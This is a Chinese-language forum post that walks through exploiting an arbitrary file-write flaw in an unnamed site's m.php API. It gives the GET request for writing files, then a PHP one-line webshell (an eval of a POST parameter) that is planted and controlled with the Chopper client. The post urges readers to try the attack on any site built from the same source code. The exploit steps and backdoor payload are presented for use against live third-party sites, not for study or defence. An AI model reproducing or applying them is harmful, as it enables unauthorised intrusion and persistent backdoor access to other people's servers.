设为首页
收藏本站
切换到宽版
登录
立即注册
找回密码
搜索
搜索
本版
帖子
用户
快捷导航
论坛
BBS
VIP用户组
官网群
无名商城论坛
»
论坛
›
资源分享区
›
学习资源专区
›
【HR】利用一个源码漏洞黑进xx站
返回列表
发帖
查看:
243
|
回复:
0
[其他技术]
【HR】利用一个源码漏洞黑进xx站
[复制链接]
无名
无名
当前离线
积分
32464
1万
主题
1万
帖子
3万
积分
管理员
积分
32464
发消息
发表于 2022-5-8 15:29:17
|
显示全部楼层
|
阅读模式
话不多说,先讲一下这个漏洞
其实就是一个文件写入漏洞,我利用了这个漏洞写入了后门,就是这个API接口的漏洞
这源码里面的m.php文件可以任意写入文件
可以看到msb是文件名,msg这些参数是写入文件里面的,
使用get类型提交m.php?msb=kele&msg=测试,然后提交就会在/ipa/目录下多了个kele.php的文件,里面也有测试两个字
那么我把他换成<?php phpinfo();?>呢
然后再打开/ipa/kele.php文件
可以看到已经执行了php代码,然后在换成后门代码
<?php @eval($_POST['kele']); ?>
然后在用菜刀连接就好了[滑稽]
这就是个任意文件写入漏洞,看到这个源码搭建的站可以试试利用这个漏洞
如果影响了某人的利益请联系我删帖[滑稽]
注非原创,搬砖
漏洞
,
文件
,
写入
,
这个
,
然后
相关帖子
•
【LUR】自动获取IP和位置的社工系统源码(已取的原作同意哦)
•
【FUT】 Fw写入文本
•
【LUR】添加网站本地背景音乐各种播放模式
•
【FUT】iapp上传文件获取直链
•
【LUR】 Amoli私有云 简约而不简单的私有云网盘搭建程序源
•
【DMT】<web安全系列>代码审计,SQL漏洞发现
•
【源码分享】【D.M.T】超简约在线留言板,无需登陆直接留言!
回复
使用道具
举报
返回列表
发帖
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表